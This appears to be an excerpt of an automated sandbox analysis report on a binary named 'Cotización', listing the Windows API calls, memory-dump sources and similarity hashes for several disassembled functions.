                  • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                  • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                  • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                  • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                • MoveToEx.GDI32(?,?,?,00000000), ref: 004472A0
                • LineTo.GDI32(?,?,?), ref: 004472AC
                • MoveToEx.GDI32(?,?,?,00000000), ref: 004472BA
                • LineTo.GDI32(?,?,?), ref: 004472C6
                • EndPath.GDI32(?), ref: 004472D6
                • StrokePath.GDI32(?), ref: 004472E4
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: ObjectPath$LineMoveSelect$BeginCreateDeleteStroke
                • String ID:
                • API String ID: 372113273-0
                • Opcode ID: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                • Instruction ID: 9972a7b2ea06d4c5ad2b855a17b8a9a0d98d12ec42d2644493c4a69bc6448ed6
                • Opcode Fuzzy Hash: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                • Instruction Fuzzy Hash: 7701BC76101214BBE3119B44ED8DFDF7B6CEF4A710F104259FA01A629187F42A02CBBD
                APIs
                • GetDC.USER32(00000000), ref: 0044CC6D
                • GetDeviceCaps.GDI32(00000000,00000058), ref: 0044CC78
                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0044CC84
                • ReleaseDC.USER32(00000000,00000000), ref: 0044CC90
                • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCA8
                • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCB9
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: CapsDevice$Release
                • String ID:
                • API String ID: 1035833867-0
                • Opcode ID: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                • Instruction ID: 48d0fedbc9b5ed1f8cca1220e36c4d83aa6571d18a2c693a8c9b468b660f0fbb
                • Opcode Fuzzy Hash: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                • Instruction Fuzzy Hash: 60015276240214BFFB009F95DD89F5A7BACFF54751F14802EFF089B240D6B098008BA4
                APIs
                • __getptd.LIBCMT ref: 0041708E
                  • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                  • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                • __amsg_exit.LIBCMT ref: 004170AE
                • __lock.LIBCMT ref: 004170BE
                • InterlockedDecrement.KERNEL32(?), ref: 004170DB
                • _free.LIBCMT ref: 004170EE
                • InterlockedIncrement.KERNEL32(02F82CE0), ref: 00417106
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                • String ID:
                • API String ID: 3470314060-0
                • Opcode ID: 80714434994c9102abdbbcfc383ede657addd51ae4f203e3d2298efcf25a3187
                • Instruction ID: d92c7102fc6d098775a0f5363b9b5483e5b10d08a1c29475ed017091780ded1e
                • Opcode Fuzzy Hash: 80714434994c9102abdbbcfc383ede657addd51ae4f203e3d2298efcf25a3187
                • Instruction Fuzzy Hash: 3301AD32905711ABC721ABA698497DE7BB0AB04724F15416BF950A7381CB3CAAC1CFDD
                APIs
                • InterlockedExchange.KERNEL32(?,?), ref: 0044B655
                • EnterCriticalSection.KERNEL32(?), ref: 0044B666
                • TerminateThread.KERNEL32(?,000001F6), ref: 0044B674
                • WaitForSingleObject.KERNEL32(?,000003E8,?,000001F6), ref: 0044B682
                  • Part of subcall function 00432614: CloseHandle.KERNEL32(00000000,00000000,?,0044B68E,00000000,?,000003E8,?,000001F6), ref: 00432622
                • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B697
                • LeaveCriticalSection.KERNEL32(?), ref: 0044B69E
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                • String ID:
                • API String ID: 3495660284-0
                • Opcode ID: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                • Instruction ID: c0d5b59c8b9084ef0a5212f46b36de0b3fb5a8468090cd03c061fc2099eb7203
                • Opcode Fuzzy Hash: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                • Instruction Fuzzy Hash: A8F0AF72141201BBD210AB64EE8CDAFB77CFF88311F40092AFA0192560CBB4E420CBB6
                APIs
                • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00410AE8
                • MapVirtualKeyW.USER32(00000010,00000000), ref: 00410AF0
                • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00410AFB
                • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00410B06
                • MapVirtualKeyW.USER32(00000011,00000000), ref: 00410B0E
                • MapVirtualKeyW.USER32(00000012,00000000), ref: 00410B16
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: Virtual
                • String ID:
                • API String ID: 4278518827-0
                • Opcode ID: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                • Instruction ID: ec5b0e47a8727e2ef01e8325cfcf1e1c5a721ad9102a6d662b709b351e7b749c
                • Opcode Fuzzy Hash: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                • Instruction Fuzzy Hash: 79016770106B88ADD3309F668C84B47FFF8EF95704F01491DD1D507A52C6B5A84CCB69
                APIs
                • ___set_flsgetvalue.LIBCMT ref: 004151C0
                  • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                  • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                • ___fls_getvalue@4.LIBCMT ref: 004151CB
                  • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                • ___fls_setvalue@8.LIBCMT ref: 004151DD
                • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                • ExitThread.KERNEL32 ref: 004151ED
                • __freefls@4.LIBCMT ref: 00415209
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                • String ID:
                • API String ID: 442100245-0
                • Opcode ID: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                • Instruction ID: 28e435cdead01fd65333368df2891c86ea6a44e569ea48f613a140ff37384f5b
                • Opcode Fuzzy Hash: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                • Instruction Fuzzy Hash: FEF01975544700AFC704BF76C54D9CE7BB99F94349720845EB80887222DA3CD8C2C669
                APIs
                  • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                  • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                • GetMenuItemInfoW.USER32(?,00000000), ref: 0045F85C
                • _wcslen.LIBCMT ref: 0045F94A
                • SetMenuItemInfoW.USER32(00000011,00000000,00000000,?), ref: 0045F9AE
                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                • SetMenuDefaultItem.USER32(00000000,000000FF,00000000,?,00000000), ref: 0045F9CA
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: ItemMenu$Info_wcslen$Default_malloc_wcscpy
                • String ID: 0
                • API String ID: 621800784-4108050209
                • Opcode ID: ba56779765e6f71d67f6246429d0af9e67b9def047912433c0c15b7e926c8fa5
                • Instruction ID: 8916cda2fcff4f3da81aa675480f1736598f59ba0f795e6899437ff2d0190f01
                • Opcode Fuzzy Hash: ba56779765e6f71d67f6246429d0af9e67b9def047912433c0c15b7e926c8fa5
                • Instruction Fuzzy Hash: E061EDB1604301AAD710EF69D885B6B77A4AF99315F04493FF98087292E7BCD84CC79B
                APIs
                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                • SetErrorMode.KERNEL32 ref: 004781CE
                • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00478387
                  • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                • SetErrorMode.KERNEL32(?), ref: 00478270
                • SetErrorMode.KERNEL32(?), ref: 00478340
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: ErrorMode$AttributesFile_memmove_wcslen
                • String ID: \VH
                • API String ID: 3884216118-234962358
                • Opcode ID: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                • Instruction ID: 3f1cdca54a202f1bd1938e87a451cd9606667cca5306a7eaf6ab6c0a6d737147
                • Opcode Fuzzy Hash: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                • Instruction Fuzzy Hash: F9619F715043019BC310EF25C585A5BB7E0BFC8708F04896EFA996B392CB76ED45CB96
                APIs
                • LoadLibraryA.KERNEL32(?), ref: 00434B10
                • GetProcAddress.KERNEL32(?,AU3_GetPluginDetails), ref: 00434B88
                • FreeLibrary.KERNEL32(?), ref: 00434B9F
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: Library$AddressFreeLoadProc
                • String ID: AU3_GetPluginDetails$ou
                • API String ID: 145871493-528704710
                • Opcode ID: 525874d34911f66d3e6dd89a42f64d0fb8abb6a055dcd3ee386d4a3c405b38ac
                • Instruction ID: fc8523f5daf935d660d2a9c884068eb8da3e2fc1adb06f3317e0194b47a185ca
                • Opcode Fuzzy Hash: 525874d34911f66d3e6dd89a42f64d0fb8abb6a055dcd3ee386d4a3c405b38ac
                • Instruction Fuzzy Hash: C24107B9600605EFC710DF59D8C0E9AF7A5FF89304B1082AAEA1A8B311D735FD52CB95
                APIs
                • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448539
                • IsMenu.USER32(?), ref: 0044854D
                • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0044859B
                • DrawMenuBar.USER32 ref: 004485AF
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: Menu$Item$DrawInfoInsert
                • String ID: 0
                • API String ID: 3076010158-4108050209
                • Opcode ID: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                • Instruction ID: 7b58e0297b022ec9ba855d833b0382692745775969200e6848d17b537ef0d45f
                • Opcode Fuzzy Hash: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                • Instruction Fuzzy Hash: 1F417975A00209AFEB10DF55D884B9FB7B5FF59300F14852EE9059B390DB74A845CFA8
                APIs
                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00469D69
                • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00469D7C
                • SendMessageW.USER32(?,00000189,00000000,00000000), ref: 00469DAC
                  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: MessageSend$_memmove_wcslen
                • String ID: ComboBox$ListBox
                • API String ID: 1589278365-1403004172
                • Opcode ID: 4395ff4c2c8cdf0c8fa99ec605851f177d12593d5a8a66f2884a0b9051c55526
                • Instruction ID: b025c67d46b61e1fa51b41144ded2117d8c1ab71acdc4e5cb50a5164a05e923b
                • Opcode Fuzzy Hash: 4395ff4c2c8cdf0c8fa99ec605851f177d12593d5a8a66f2884a0b9051c55526
                • Instruction Fuzzy Hash: 8D31287160010477DB10BB69CC45BEF775C9F86324F10852FF918AB2D1DABC9E4583A6
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: Handle
                • String ID: nul
                • API String ID: 2519475695-2873401336
                • Opcode ID: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                • Instruction ID: 058e2060cb23de8d889deff533ab301820a4ae088d702658d54b05e79d5a48de
                • Opcode Fuzzy Hash: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                • Instruction Fuzzy Hash: 84319571500204ABEB20DF68DC46BEB77A8EF04721F104A4EFD50973D1E7B59A50CBA5
                APIs
                • GetStdHandle.KERNEL32(000000F6), ref: 0044337D
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: Handle
                • String ID: nul
                • API String ID: 2519475695-2873401336
                • Opcode ID: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                • Instruction ID: 7fb8f1e98e57093f7bc771e71f756598ee5282d4f5ffeaa4ddc08f3ab3272662
                • Opcode Fuzzy Hash: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                • Instruction Fuzzy Hash: 05219331600204ABE720DF689C49FAB77A8EF55731F20474EFDA0972D0EBB59A50C795
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID:
                • String ID: SysAnimate32
                • API String ID: 0-1011021900
                • Opcode ID: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                • Instruction ID: b1a10ecfd0a3fc3d2af2854cd73c9de1262d8b9fd4b2252518a975ef6c54cff1
                • Opcode Fuzzy Hash: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                • Instruction Fuzzy Hash: 0D21C975600205ABFB149EA9EC81FAB73DCEB95324F20471BF711972C0D279EC518768
                APIs
                  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                  • Part of subcall function 0043646A: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                  • Part of subcall function 0043646A: GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                  • Part of subcall function 0043646A: GetCurrentThreadId.KERNEL32 ref: 004364A3
                  • Part of subcall function 0043646A: AttachThreadInput.USER32(00000000), ref: 004364AA
                • GetFocus.USER32 ref: 0046157B
                  • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364C3
                  • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364CF
                • GetClassNameW.USER32(?,?,00000100), ref: 004615C4
                • EnumChildWindows.USER32(?,Function_00045B98,?), ref: 004615EF
                • __swprintf.LIBCMT ref: 00461608
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: Thread$Parent$AttachChildClassCurrentEnumFocusInputMessageNameProcessSendTimeoutWindowWindows__swprintf_memmove_wcslen
                • String ID: %s%d
                • API String ID: 2645982514-1110647743
                • Opcode ID: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                • Instruction ID: 8eac61321038dbd32bfe14263504560db7c98c8fbeeeb2eb49a46d34c9d63f73
                • Opcode Fuzzy Hash: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                • Instruction Fuzzy Hash: 272180756007096BD610AF69DC89FAF73A8FB88704F00841FF918A7241DAB8A9418B69
                Memory Dump Source
